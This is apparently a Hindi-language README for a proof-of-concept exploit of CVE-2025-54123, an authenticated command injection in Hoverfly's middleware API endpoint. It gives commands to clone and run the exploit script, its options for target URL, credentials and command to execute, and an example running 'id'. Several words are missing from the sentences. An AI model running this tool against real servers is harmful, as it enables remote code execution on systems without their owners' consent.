
CVE-2025-54123 के लिए प्रमाण-अवधारणा शोषण, Hoverfly <= 1.11.3 में एक महत्वपूर्ण प्रमाणित कमांड इंजेक्शन, मिडलवेयर API एंडपॉइंट के माध्यम से दूरस्थ कोड निष्पादन सक्षम करता है।
PoC CVE-2025-54123 - हॉवरफ्लाई में मिडलवेयर कमांड इंजेक्शन
यह कमजोरी Hoverfly संस्करण ≤ 1.11.3 को प्रभावित करती है और विशेष रूप से /api/v2/hoverfly/middleware एंडपॉइंट को लक्षित करती है। यह कई फ़ाइलों, जिनमें middleware.go, local_middleware.go, और hoverfly_service.go शामिल हैं, में के कारण होती है। पैरामीटर को प्रदान किया गया उपयोगकर्ता-नियंत्रित इनपुट बिना उचित जाँच के सीधे सिस्टम बाइनरी (जैसे, ) को पास कर दिया जाता है, जिससे Hoverfly प्रक्रिया के विशेषाधिकारों के साथ की अनुमति मिलती है।
script/bin/bashcurlgit clone https://github.com/f4dee-backup/CVE-2025-54123
cd CVE-2025-54123
chmod +x CVE-2025-54123.sh
./CVE-2025-54123.sh -h
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ███████╗ ███████╗██╗ ██╗ ██╗██████╗ ██████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██╔════╝ ██╔════╝██║ ██║███║╚════██╗╚════██╗
██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████╗█████╗███████╗███████║╚██║ █████╔╝ █████╔╝
██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝╚════██║╚════██║ ██║██╔═══╝ ╚═══██╗
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗███████║ ███████║ ██║ ██║███████╗██████╔╝
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚══════╝ ╚══════╝ ╚═╝ ╚═╝╚══════╝╚═════╝
Hoverfly <= 1.11.3 - Authenticated Middleware Command Injection
[?] Parameters description:
-t Target base URL (e.g., http://target:8888)
-u Valid username
-p Valid password
-c Command to execute (must be enclosed in double quotes)
-h Show this help panel
[i] Example:
./CVE-2025-54123.sh -t http://target.com:8888 -u admin -p password -c "id"
यह शोषण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है।
स्पष्ट अनुमति के बिना सिस्टम के विरुद्ध इसका उपयोग न करें। अनधिकृत पहुँच अवैध हो सकती है।
लेखक दुरुपयोग या किसी भी हुई क्षति के लिए कोई जिम्मेदारी नहीं लेता है।